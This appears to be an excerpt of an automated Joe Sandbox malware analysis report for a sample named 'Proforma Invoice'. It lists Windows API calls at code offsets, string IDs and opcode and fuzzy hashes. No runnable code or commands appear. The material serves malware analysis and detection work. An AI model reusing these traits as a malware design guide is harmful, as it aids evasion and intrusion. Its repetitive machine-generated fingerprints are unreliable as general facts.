                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                • String ID: LPT
                                                                                                • API String ID: 3222508074-1350329615
                                                                                                • Opcode ID: ada1f5bc14d3e5942a395b8d7ee4796a5b93c1cfdba139ef4c6313c5d8ff5755
                                                                                                • Instruction ID: ce298681d65d5cfff618735bd4396d95786b859a48b9ae11cd67175f8f63ad1d
                                                                                                • Opcode Fuzzy Hash: ada1f5bc14d3e5942a395b8d7ee4796a5b93c1cfdba139ef4c6313c5d8ff5755
                                                                                                • Instruction Fuzzy Hash: E0619E75A00219EFCB14EF94C891EAEB7F5EF09310F104269F916AB291D774AF80CB54
                                                                                                APIs
                                                                                                • Sleep.KERNEL32(00000000), ref: 006B2968
                                                                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 006B2981
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: GlobalMemorySleepStatus
                                                                                                • String ID: @
                                                                                                • API String ID: 2783356886-2766056989
                                                                                                • Opcode ID: 2e63dfb62dcff0f4b58217296309c55bf1f83aa6284ab61b292a981faa3d1ed5
                                                                                                • Instruction ID: 0332694676f6bc20ca1a7d8531cd2b285f7cedb3192cddc68e3daa222080eb59
                                                                                                • Opcode Fuzzy Hash: 2e63dfb62dcff0f4b58217296309c55bf1f83aa6284ab61b292a981faa3d1ed5
                                                                                                • Instruction Fuzzy Hash: 97514971418744AFE360EF10D886BAFB7F8FB86344F51895DF2D8410A1DB349929CB6A
                                                                                                APIs
                                                                                                  • Part of subcall function 006A4F0B: __fread_nolock.LIBCMT ref: 006A4F29
                                                                                                • _wcscmp.LIBCMT ref: 00709824
                                                                                                • _wcscmp.LIBCMT ref: 00709837
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcscmp$__fread_nolock
                                                                                                • String ID: FILE
                                                                                                • API String ID: 4029003684-3121273764
                                                                                                • Opcode ID: 27054f8a68ae11dd124f3c1e4844e62c0d868562a4970c976ce517b0a952085e
                                                                                                • Instruction ID: 5cfcc220ac933f3f16c24f2be4629dd952c45300f09d3cc3ceb93523d6294fbf
                                                                                                • Opcode Fuzzy Hash: 27054f8a68ae11dd124f3c1e4844e62c0d868562a4970c976ce517b0a952085e
                                                                                                • Instruction Fuzzy Hash: FF41A971A00219BADF21ABA0CC45FEFB7FADFC6710F004469FA04E71C1DAB5A9048B65
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClearVariant
                                                                                                • String ID: Ddv$Ddv
                                                                                                • API String ID: 1473721057-686535144
                                                                                                • Opcode ID: 19ad85c2550ab7ddfa1c6b601d4f450385e21ce651941ccdd00656d97435ee9a
                                                                                                • Instruction ID: 9dc08402e056d26f0a89c9b18a1724de2ba8dce46aadca81ae32f1adc3ed7bd1
                                                                                                • Opcode Fuzzy Hash: 19ad85c2550ab7ddfa1c6b601d4f450385e21ce651941ccdd00656d97435ee9a
                                                                                                • Instruction Fuzzy Hash: B35125786053429FD750DF19C480A5ABBF2FB9A344F54885EE8868B321D775EC85CF82
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 0071259E
                                                                                                • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 007125D4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: CrackInternet_memset
                                                                                                • String ID: |
                                                                                                • API String ID: 1413715105-2343686810
                                                                                                • Opcode ID: 7b4ea5f82b9d1d9866bcf52313cb94a5fb3ebb2259fbd60f7e64ba254d46d707
                                                                                                • Instruction ID: 7d648c147b94b943344804ebe092e2a7c34bb0edbf26ff369122ed1037ab38cc
                                                                                                • Opcode Fuzzy Hash: 7b4ea5f82b9d1d9866bcf52313cb94a5fb3ebb2259fbd60f7e64ba254d46d707
                                                                                                • Instruction Fuzzy Hash: 3A311771800119EBCF41EFA4CC85EEEBFB9FF09310F100069F915A61A2EA359956DF64
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00727B61
                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00727B76
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID: '
                                                                                                • API String ID: 3850602802-1997036262
                                                                                                • Opcode ID: 12026118bf2dba8ec29dc4b4ff6d8f2cd3517314c25eddbe4e9a6bf4a54f4f41
                                                                                                • Instruction ID: 1d1805a080997773711c2b53d128aa67723ef747a6eb622e3e2d11a621f7524e
                                                                                                • Opcode Fuzzy Hash: 12026118bf2dba8ec29dc4b4ff6d8f2cd3517314c25eddbe4e9a6bf4a54f4f41
                                                                                                • Instruction Fuzzy Hash: A2412774A0531ADFDB18CF68D981BEABBB5FB08310F10416AE905AB381D774AA51DF90
                                                                                                APIs
                                                                                                • DestroyWindow.USER32(?,?,?,?), ref: 00726B17
                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00726B53
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$DestroyMove
                                                                                                • String ID: static
                                                                                                • API String ID: 2139405536-2160076837
                                                                                                • Opcode ID: 44ccb47d2fc44899fbd941c6dee5768a2e848109493757e85f7fca77d41dd571
                                                                                                • Instruction ID: f8752fd72d5d1d4a15244b0805441faa8f7dd80493a2096e0da745c705dd1e10
                                                                                                • Opcode Fuzzy Hash: 44ccb47d2fc44899fbd941c6dee5768a2e848109493757e85f7fca77d41dd571
                                                                                                • Instruction Fuzzy Hash: 703190B1100614AEDB109F64DC80BFB73B9FF48760F10962EF9A5D7190DA38AC91CB64
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 00702911
                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0070294C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: InfoItemMenu_memset
                                                                                                • String ID: 0
                                                                                                • API String ID: 2223754486-4108050209
                                                                                                • Opcode ID: 8d7f59e74341cc0a20fc992c9ed08620bce0c46a6e4d4eb12272b4dd64f23ad7
                                                                                                • Instruction ID: 0ee2cc3476823093c687b77804243bba487f76df9c220fbd29178b1dc5697f85
                                                                                                • Opcode Fuzzy Hash: 8d7f59e74341cc0a20fc992c9ed08620bce0c46a6e4d4eb12272b4dd64f23ad7
                                                                                                • Instruction Fuzzy Hash: 6531F732610305DBEB24CF48C849BAEBBF9EF05350F144229E8C5B61E2D778A942CB51
                                                                                                APIs
                                                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00726761
                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0072676C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID: Combobox
                                                                                                • API String ID: 3850602802-2096851135
                                                                                                • Opcode ID: b57ca461d3a22e4ca6e10626ef57f558d9eb4e9438f48dd64f7194b86e0ff106
                                                                                                • Instruction ID: 0e8317cba0757651a69ced318358b7669fa3047300b78b75c414a29227dcfff0
                                                                                                • Opcode Fuzzy Hash: b57ca461d3a22e4ca6e10626ef57f558d9eb4e9438f48dd64f7194b86e0ff106
                                                                                                • Instruction Fuzzy Hash: 6411C475300218AFEF21DF54EC80EFB376AEB49368F10412AF9149B390D679DC5197A0
                                                                                                APIs
                                                                                                  • Part of subcall function 006A1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 006A1D73
                                                                                                  • Part of subcall function 006A1D35: GetStockObject.GDI32(00000011), ref: 006A1D87
                                                                                                  • Part of subcall function 006A1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 006A1D91
                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00726C71
                                                                                                • GetSysColor.USER32(00000012), ref: 00726C8B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                • String ID: static
                                                                                                • API String ID: 1983116058-2160076837
                                                                                                • Opcode ID: ca473188894863d5c4855297ebd4294460fc7f363caea7d854abe5fa53024e0a
                                                                                                • Instruction ID: 7a92009997492c6bae0c1c7b7c61bb8feb2b6a6ff233c60ae3ade3dc8d6720f4
                                                                                                • Opcode Fuzzy Hash: ca473188894863d5c4855297ebd4294460fc7f363caea7d854abe5fa53024e0a
                                                                                                • Instruction Fuzzy Hash: DE212972510219AFDF14EFA8DC45EEA7BB8FB08314F004A29F995D2250D739E861DB60
                                                                                                APIs
                                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 007269A2
                                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007269B1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: LengthMessageSendTextWindow
                                                                                                • String ID: edit
                                                                                                • API String ID: 2978978980-2167791130
                                                                                                • Opcode ID: 946c37ddf596653b30999bcf65a27db396c38f4b711b27ea29e55e49b35152d0
                                                                                                • Instruction ID: 5ef6c1872a793ea631eac92a030bdf5b436803a5eeac99015592ea06b9d6068c
                                                                                                • Opcode Fuzzy Hash: 946c37ddf596653b30999bcf65a27db396c38f4b711b27ea29e55e49b35152d0
                                                                                                • Instruction Fuzzy Hash: A511BF71100224ABEB108F64EC44EEB3769EB05374F104729F9E1971E0CB39EC919B60
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 00702A22
                                                                                                • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00702A41
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: InfoItemMenu_memset
                                                                                                • String ID: 0
                                                                                                • API String ID: 2223754486-4108050209
                                                                                                • Opcode ID: 7f094d453a299f3374f2b6aba1a3ee645423756d2b6fc9ba24bb344f4ed275d2
                                                                                                • Instruction ID: 20e0c97e3dbffb338d2430cb2ef018445734d15f58910b2fc97398b976897b7d
                                                                                                • Opcode Fuzzy Hash: 7f094d453a299f3374f2b6aba1a3ee645423756d2b6fc9ba24bb344f4ed275d2
                                                                                                • Instruction Fuzzy Hash: D311B4B3A01224EACF30DA98D848B9A77E8AB45340F14C261EC55E72D1DB78AD0BC795
                                                                                                APIs
                                                                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0071222C
                                                                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00712255
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Internet$OpenOption
                                                                                                • String ID: <local>
                                                                                                • API String ID: 942729171-4266983199
                                                                                                • Opcode ID: 92d7daa910446e810b8a3b6f11291c23ab42c39a8684fa631f9a3ec741db272c
                                                                                                • Instruction ID: 402bf27b2bcb4fc8f88643ce6cf7e00957fda5175a26d32c87fc330bb3d873ff
                                                                                                • Opcode Fuzzy Hash: 92d7daa910446e810b8a3b6f11291c23ab42c39a8684fa631f9a3ec741db272c
                                                                                                • Instruction Fuzzy Hash: 86110270501225BADB248F198C84EFBFBA8FF06351F10822AFA0446181E2B858E6D6F0
                                                                                                APIs
                                                                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,006A3C14,007652F8,?,?,?), ref: 006B096E
                                                                                                  • Part of subcall function 006A7BCC: _memmove.LIBCMT ref: 006A7C06
                                                                                                • _wcscat.LIBCMT ref: 006E4CB7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: FullNamePath_memmove_wcscat
                                                                                                • String ID: Sv
                                                                                                • API String ID: 257928180-3435220482
                                                                                                • Opcode ID: 5f376c20f8272ad4f109021253388c5c26f5be99627a1dba8a96d95d755217d4
                                                                                                • Instruction ID: 8d742121a0bedb0944db5c8137afb55f50e345987c4c74b06a88c12c451cb0a8
                                                                                                • Opcode Fuzzy Hash: 5f376c20f8272ad4f109021253388c5c26f5be99627a1dba8a96d95d755217d4
                                                                                                • Instruction Fuzzy Hash: E611A9719052099A9B90FF64CC05EDE77BAEF09740F0054AAF945D7341DEB0AAC45B18
                                                                                                APIs
                                                                                                  • Part of subcall function 006A7DE1: _memmove.LIBCMT ref: 006A7E22
                                                                                                  • Part of subcall function 006FAA99: GetClassNameW.USER32(?,?,000000FF), ref: 006FAABC
                                                                                                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 006F8E73
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClassMessageNameSend_memmove
                                                                                                • String ID: ComboBox$ListBox
                                                                                                • API String ID: 372448540-1403004172
                                                                                                • Opcode ID: 6aeee0ec1842dbec5d83b0ab3b304ae89dbae2fda3bd1378d884008eb6027853
                                                                                                • Instruction ID: da479282ea5b1fc6afa53ca13cd0153ae673c6b65593f74c7388ba18ef45a40a
                                                                                                • Opcode Fuzzy Hash: 6aeee0ec1842dbec5d83b0ab3b304ae89dbae2fda3bd1378d884008eb6027853
                                                                                                • Instruction Fuzzy Hash: 6701F1B160521CAB8B14FBA0CC468FE736AEF06320B000A5DF926573E1DE355C0CCA50
                                                                                                APIs
                                                                                                  • Part of subcall function 006A7DE1: _memmove.LIBCMT ref: 006A7E22
                                                                                                  • Part of subcall function 006FAA99: GetClassNameW.USER32(?,?,000000FF), ref: 006FAABC
                                                                                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 006F8D6B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClassMessageNameSend_memmove
                                                                                                • String ID: ComboBox$ListBox
                                                                                                • API String ID: 372448540-1403004172
                                                                                                • Opcode ID: 41f72ce9e3a2f02458bb8470304f00dae69e23136bc16e71fd721710dec0fd70
                                                                                                • Instruction ID: e1be099595d8f9b472ef49617e28664e036d38dd5fc84e8f0ed1e2059a254c40
                                                                                                • Opcode Fuzzy Hash: 41f72ce9e3a2f02458bb8470304f00dae69e23136bc16e71fd721710dec0fd70
                                                                                                • Instruction Fuzzy Hash: FE01BCB1A4110CABCB18FBA0C952AFE77AA9F16300F10006EB906672A1DE295E0CD665
                                                                                                APIs
                                                                                                  • Part of subcall function 006A7DE1: _memmove.LIBCMT ref: 006A7E22
                                                                                                  • Part of subcall function 006FAA99: GetClassNameW.USER32(?,?,000000FF), ref: 006FAABC
                                                                                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 006F8DEE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClassMessageNameSend_memmove
                                                                                                • String ID: ComboBox$ListBox
                                                                                                • API String ID: 372448540-1403004172
                                                                                                • Opcode ID: fbd9d6035f0fd2e13a31f38c941820c449b82b2d60de98402a2864dc3452d95d
                                                                                                • Instruction ID: 17c7b7a45c6a3f5d60f6ad924acc15fe07988da2f79541e1fa0809a0c34f27fa
                                                                                                • Opcode Fuzzy Hash: fbd9d6035f0fd2e13a31f38c941820c449b82b2d60de98402a2864dc3452d95d
                                                                                                • Instruction Fuzzy Hash: FA01F2B1A4110CABCB14FAA4C942EFFB3AACF26300F10001EB90663292DE295E0DD675
                                                                                                APIs
                                                                                                • VariantInit.OLEAUT32(?), ref: 006FC534
                                                                                                  • Part of subcall function 006FC816: _memmove.LIBCMT ref: 006FC860
                                                                                                  • Part of subcall function 006FC816: VariantInit.OLEAUT32(00000000), ref: 006FC882
